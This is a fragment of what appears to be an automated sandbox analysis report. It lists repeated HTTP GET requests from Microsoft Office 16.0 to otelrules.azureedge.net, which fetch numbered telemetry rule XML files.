                    Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
